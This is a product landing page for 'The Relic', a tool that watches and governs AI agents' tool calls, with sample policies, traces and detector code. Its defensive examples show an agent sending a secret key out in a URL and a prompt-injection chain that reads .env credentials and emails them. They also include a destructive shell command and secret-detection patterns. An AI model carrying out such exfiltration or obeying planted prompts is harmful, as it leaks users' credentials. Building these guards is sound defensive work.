See every agent.
Govern every decision.

The Relic is the authorization layer for the agent era.

/01 · Dashboard

Where your team
runs the fleet.

Trends, denials, top offenders. One screen for the lead.

/02 · Live

Watch your fleet,
live.

Every intent surfaces before the verdict. Click any row to see the call, the parameters, and the rule that decided.

/03 · Policy

Edit. Replay.
Save.

Test every rule against your last 30 days of agent history. Then ship.

app.therelic.dev

acme · prod overview

30 day window

Agents

247

+12 this week

Traces

1.2M

30 days

Denied

3,891

this month

Proposals

8

pending

Runs · last 30 days peak 52k · avg 38k
Top denied targets
execute_command 1,204
web_fetch (entropy) 892
send_email 417
file_write /etc 203
Recent runs
code-assist 24 0 2s
data-ingest 142 3 14s
support-bot 8 0 1m
research 67 12 4m
app.therelic.dev/live
live

Live activity

12 agents reporting · last 60s

all agents ▾
all verdicts ▾

allow

412

deny

7

flagged

2

pending

3

code-assist · prod just now · 8 actions
verdict target rule
allow web_search("relic governance docs") rule:allow-search
allow read_file("./README.md") rule:allow-read
deny execute_command("rm -rf /tmp/cache") rule:deny-shell
allow write_file("./out/summary.md") rule:allow-write
pending web_fetch("github.com/api/repos") rule:evaluating…
data-ingest · prod 0.3s ago
support-bot · staging 1.1s ago
research-agent · dev 2.4s ago
app.therelic.dev/policies/prod

prod / web-agents

selector env=prod tier=web · 47 agents matched

unsaved

# candidate policy
version: "1"
mode: enforce
default: deny
rules:
  - id: allow-search
    target: "web_search"
    action: allow
  - id: deny-fetch-with-creds
    target: "web_fetch"
    when: "url contains 'token='"
    action: deny

Replay · last 7 days

would deny

42

previously allowed

would allow

0

previously denied

unchanged

8.1k

verdicts identical

The premise

Agents act on
your behalf.
You can't see what they did.

Files written. APIs called. Commands run. Most works. Some shouldn't have.

The solution

The Relic
puts you in control.

One layer between every agent and every tool it uses. Records what happens. Enforces what shouldn't.

Chapter 1

Observe

Every action, surfaced as it happens.

Chapter 2

Govern

One policy. Every agent. Seconds.

Chapter 3

Audit

A signed record of everything.

How it works

One system.
Four jobs.

Each pillar runs in the same runtime. Same trace chain. Same dashboard.

/01 · Policy Engine

YAML rules, first match wins, default deny.

Glob-matched rules evaluate every tool call, file read, and network request before it executes. Predictable, testable, reviewable.

  • Enforce, audit, or permissive modes
  • Parameter-level glob matching
  • Ed25519 signing, hot-reload

# .tr/policy.yaml
version: "1"
mode: enforce
default: deny
rules:
  - id: allow-search
    target: "web_search"
    action: allow
  - id: deny-shell
    target: "{shell,bash,exec}"
    action: deny
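
The sketch below is an added example, not The Relic's own code: it evaluates rules first-match-wins with brace-glob targets and default deny, then replays a candidate policy over recorded calls the way the policy editor's replay panel counts changes. The `when` grammar, the `allow-fetch` rule and the call history are assumptions made for illustration.

```python
import fnmatch
import re

def expand_braces(pattern):
    """Expand non-nested {a,b} alternation into plain fnmatch globs."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    return [g for alt in m.group(1).split(",") for g in expand_braces(head + alt + tail)]

def condition_holds(when, params):
    """Assumed grammar: "<param> contains '<text>'"; a rule without `when` always holds."""
    if when is None:
        return True
    m = re.fullmatch(r"(\w+) contains '([^']*)'", when)
    if not m:
        raise ValueError(f"unsupported condition: {when!r}")  # reject, never skip silently
    return m.group(2) in str(params.get(m.group(1), ""))

def evaluate(policy, target, params):
    """First matching rule wins; no match falls through to the policy default."""
    for rule in policy["rules"]:
        hit = any(fnmatch.fnmatchcase(target, g) for g in expand_braces(rule["target"]))
        if hit and condition_holds(rule.get("when"), params):
            return rule["action"], rule["id"]
    return policy["default"], "default"

def replay(old, new, history):
    """Count verdict changes if `new` replaced `old` over recorded calls."""
    diff = {"would deny": 0, "would allow": 0, "unchanged": 0}
    for target, params in history:
        before, after = evaluate(old, target, params)[0], evaluate(new, target, params)[0]
        diff["unchanged" if before == after else "would " + after] += 1
    return diff

SEARCH = {"id": "allow-search", "target": "web_search", "action": "allow"}
FETCH = {"id": "allow-fetch", "target": "web_fetch", "action": "allow"}  # hypothetical rule
SHELL = {"id": "deny-shell", "target": "{shell,bash,exec}", "action": "deny"}
CREDS = {"id": "deny-fetch-with-creds", "target": "web_fetch",
         "when": "url contains 'token='", "action": "deny"}
CURRENT = {"default": "deny", "rules": [SEARCH, FETCH, SHELL]}
CANDIDATE = {"default": "deny", "rules": [SEARCH, CREDS, FETCH, SHELL]}
HISTORY = [  # constructed call history
    ("web_search", {"query": "relic governance docs"}),
    ("web_fetch", {"url": "github.com/api/repos"}),
    ("web_fetch", {"url": "api.example/log?token=abc"}),
    ("bash", {"cmd": "ls"}), ("read_file", {"path": "./README.md"}),
]
```

Because the first match wins, `deny-fetch-with-creds` only takes effect when it sits above the broader `allow-fetch` rule; placed below it, the same rule never fires.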

/02 · Exfiltration Guard

Catch secrets before they leave.

Shannon entropy and pattern matching detect API keys, JWTs, and tokens smuggled in outbound URL parameters, even through hosts the policy allows.

  • Regex patterns for keys, JWTs, PATs
  • Sequence detection for attack chains
  • Blocks indirect prompt injection

# Agent attempts data exfiltration
tool_call: web_fetch
url: api.com/log?token=sk_live_4eC39H...
DENIED exfiltration:pattern
"Stripe key detected in query params"

# Sequence attack blocked
1. web_fetch: external page w/ hidden prompt
2. read_file: reads .env credentials
3. send_email: BLOCKED
DENIED sequence:fetch-read-send
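
A minimal detector for the first case above, as an added example rather than The Relic's implementation: it checks each outbound query parameter against known token shapes, then falls back to Shannon entropy for secrets with no recognizable prefix. The patterns, the length floor, the 4.0 bits-per-character threshold and the `exfiltration:entropy` reason string are assumptions; all sample values are constructed.

```python
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Illustrative token shapes (assumed, not the product's rule set).
PATTERNS = {
    "stripe-key": re.compile(r"sk_live_[0-9A-Za-z]{16,}"),
    "jwt": re.compile(r"eyJ[\w-]+\.[\w-]+\.[\w-]+"),
    "github-pat": re.compile(r"ghp_[0-9A-Za-z]{36}"),
}
MIN_LEN = 20       # assumed: shorter values are not scored for entropy
MAX_ENTROPY = 4.0  # assumed threshold, in bits per character

def shannon_entropy(value):
    """Bits per character of the value's empirical character distribution."""
    counts = Counter(value)
    return -sum(c / len(value) * math.log2(c / len(value)) for c in counts.values())

def inspect_url(url):
    """Return (verdict, reason) for an outbound URL, whatever its host."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for label, pattern in PATTERNS.items():
            if pattern.search(value):
                return "deny", f"exfiltration:pattern {label} in '{name}'"
        if len(value) >= MIN_LEN and shannon_entropy(value) > MAX_ENTROPY:
            return "deny", f"exfiltration:entropy in '{name}'"
    return "allow", "no secret-like parameter"

# Constructed sample URLs; none of the values is a real credential.
STRIPE_LIKE = "api.example/log?token=sk_live_" + "A1b2" * 6
OPAQUE = "https://api.example/c?d=q7Zp2LxV9mKd4RtY8wNb3HsG6cJf5AeU"
BENIGN = "https://search.example/?q=relic+governance+docs"
```

The entropy check is what catches a value like `OPAQUE`, which matches no pattern; ordinary text such as the search query in `BENIGN` scores well under the threshold.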

/03 · Live Observation

Every action, as it happens.

Per-agent swimlanes stream over SSE. Intent surfaces before the verdict. The whole fleet on one screen, no setup.

  • Intent → verdict in the same row
  • Filter by agent, tool, or verdict
  • Redacted at the edge. No secrets in transit

Live · 4 agents

streaming
code-assist · now
data-ingest · 0.3s
support-bot · 1.1s
research · 2.4s

/04 · Trace Audit

A signed record of everything.

NDJSON traces with HMAC-SHA256 integrity chains. Tamper-evident, redacted, searchable from the CLI or dashboard.

  • Cryptographically chained
  • Replayable under any policy
  • Pushable to the hosted platform
.tr/traces/01JD8K…trtrace ✓ chain valid

# NDJSON · HMAC-SHA256 chain
{"t":"run","agent":"code-assist","mode":"enforce"}
{"t":"action","target":"read_file","auth":"allow"}
{"t":"action","target":"exec","auth":"deny"}
{"t":"run_end","total":24,"denied":3,"hmac":"a4f2…"}

$ relic trace search --denied --last 24h
3 denied actions across 2 runs
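
To show why a chained HMAC makes such a trace tamper-evident, here is an added example (not The Relic's trace format or code): each record is folded into a rolling HMAC-SHA256 tag and the final tag is stored on the `run_end` record. The chaining construction, the canonical JSON encoding and the key are assumptions; the record shapes follow the sample above.

```python
import hashlib
import hmac
import json

def _canon(record):
    """Canonical bytes for a record (sorted keys, no whitespace)."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()

def chain_tag(key, records):
    """Rolling tag: tag_i = HMAC(key, tag_{i-1} || record_i), returned as hex."""
    tag = b""
    for rec in records:
        tag = hmac.new(key, tag + _canon(rec), hashlib.sha256).digest()
    return tag.hex()

def seal(key, records):
    """Return NDJSON text whose final record carries the chain tag in "hmac"."""
    end = dict(records[-1], hmac=chain_tag(key, records))
    return "\n".join(json.dumps(r) for r in records[:-1] + [end])

def verify(key, ndjson):
    """True only if no record was edited, dropped, reordered or appended."""
    try:
        records = [json.loads(line) for line in ndjson.splitlines() if line.strip()]
    except json.JSONDecodeError:
        return False
    if not records or not isinstance(records[-1], dict) or "hmac" not in records[-1]:
        return False
    claimed = str(records[-1].pop("hmac"))
    return hmac.compare_digest(claimed.encode(), chain_tag(key, records).encode())

KEY = b"constructed-demo-key"  # constructed; a real key belongs in a secret store
RUN = [  # constructed run, shaped like the page's sample trace
    {"t": "run", "agent": "code-assist", "mode": "enforce"},
    {"t": "action", "target": "read_file", "auth": "allow"},
    {"t": "action", "target": "exec", "auth": "deny"},
    {"t": "run_end", "total": 24, "denied": 3},
]
TRACE = seal(KEY, RUN)
```

Flipping the `exec` verdict from `deny` to `allow`, deleting a line, or swapping two lines each changes the recomputed tag, so `verify` returns `False` without needing to know which record was touched.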

What it governs

Every framework.
Every tool call.

Wraps the agent process itself. Nothing to integrate.

Frameworks & protocols

MCP

Model Context Protocol

Claude Desktop

stdio MCP

OpenClaw

native runtime

LangChain

tool callbacks

OpenAI Agents SDK

function calls

Vercel AI SDK

streaming tools

Anthropic SDK

tool use API

AutoGen

multi-agent

HTTP / HTTPS

REST & webhooks

gRPC

server streaming

Python

wraps the process

Node · Go · Bun

any runtime

Surfaces governed

tool_call

glob-matched targets

web_fetch

URL + headers + body

web_search

query inspection

file_read / write

mount-scoped

execute_command

shell + args

send_email

recipients + body

db_query

SQL inspection

network egress

DNS allow/deny

mcp.tool_call

every MCP method

mcp.resource_read

per-resource

prompt_inject

detected upstream

custom

protocol of your own

Built for the audit

Audit-grade by default.

The platform ships SSO, signed evidence, and OTEL out of the box. The same record your engineers debug from is the record your auditor reviews.

SSO & provisioning

OIDC PKCE, SCIM tokens, invites.

Plug Okta, Entra, Auth0, Google. Mint SCIM tokens for provisioning. Revoke any session from the dashboard.

Compliance mappings

SOC 2, ISO 27001, HIPAA.

Open-source YAML maps every control to the code + docs that substantiate it. Diff it on GitHub.

Evidence pack

Signed tarball. One command.

relic-api evidence-pack --framework=soc2-cc. Hand it to the auditor; they verify with the reference Python tool.

OTEL + SIEM

Splunk, Datadog, Honeycomb.

One OTLP/HTTP endpoint covers every major backend. Policy decisions, ingest spans, login events.

Hardened by design

  • HSTS preload
  • CSRF double-submit
  • Strict CSP
  • Pre-signed S3 reads
  • Per-IP login rate limits
  • Read-replica routing
  • HMAC trace chains
  • External pen test

Backup & DR

relic-api backup --include-blobs produces a single tarball that restores to a fresh deployment with zero prior S3 history. Documented runbook for the on-call rotation.

The stack

Two pieces.
One control plane.

Runtime runs with your agent. Platform runs at app.therelic.dev.

Open source · Apache 2.0

relic · the runtime

A single Go binary. Wraps any agent. Enforces locally, traces locally, never phones home.

$ brew install therelicai/tap/relic

$ relic init

$ relic run -- python agent.py

View on GitHub
Hosted · app.therelic.dev

Platform · the team dashboard

Where the team converges. Live feed. Policy editor. Audit log. SSO and roles.

Dashboard

KPIs, charts, runs

Live

Per-agent swimlanes

Traces

Timeline + JSON

Agents

Fleet inventory

Proposals

YAML diff

Policy editor

Replay-and-diff

Audit log

Every action

Identity

SSO, SCIM, sessions

Settings

Keys, team, billing

Request platform access

A tour of the platform

Eight pages.
One mental model.

Every page exists because a specific person needs it: the engineer, the reviewer, the auditor, the lead.

Dashboard

/

KPI cards with trend indicators, run volume chart, denial rate by agent, sortable runs table.

Live

/live

Per-agent swimlanes of intent and verdict events arriving over SSE. The intent shows what the agent is about to do; the verdict overwrites it in place.

Trace Viewer

/traces/:runId

Per-run metadata with tabbed view: event timeline, detail key-values, raw JSON. Chain integrity is verified on load.

Agents

/agents

Sortable, filterable inventory of every registered agent with expandable detail panels and labels.

Proposals

/proposals

Split-pane queue of policy proposals: list with status filters on the left, YAML diff and approve/reject on the right.

Policy Editor

/policies

Selector-driven editor with a replay-and-diff badge. Type env=prod and the editor previews matched agents and the verdicts that would change.

Audit Log

/audit

Paginated table of every platform action: proposal decisions, key creation, team changes. For compliance review.

Identity

/settings/identity

SSO (OIDC) configuration, SCIM provisioning tokens, invites, active session list with admin revoke.

Settings

/settings

Account, API keys, team management, billing, notification preferences.

How it fits together

The runtime stays
where the agent runs.

All enforcement happens locally. The platform only ever sees what you push. Signed and redacted.

Your infrastructure

Agent + relic CLI

Local enforcement. Tamper-evident traces.

relic trace push

HTTPS, signed

app.therelic.dev

Platform API + UI

Stored, indexed, searchable.

SSO login

HTTPS, browser

Your team

SecOps console

Review, approve, investigate.

No runtime telemetry

The CLI makes zero outbound calls unless you opt in to push traces.

Redacted at the edge

Secrets are stripped before the trace leaves the agent's host.

SSO, RBAC, audit log

Every action on the platform is itself recorded for compliance review.

Get started

Three commands.
Governed agents.

01

Install

A single binary, no dependencies.

$ brew install therelic/tap/relic

02

Configure

Initialize a .tr/ directory with starter rules.

$ relic init

03

Govern

Wrap your agent. Every action is observed, evaluated, traced.

$ relic run -- python agent.py

Make your agents
accountable.

Free. Open source. Five minutes to first verdict.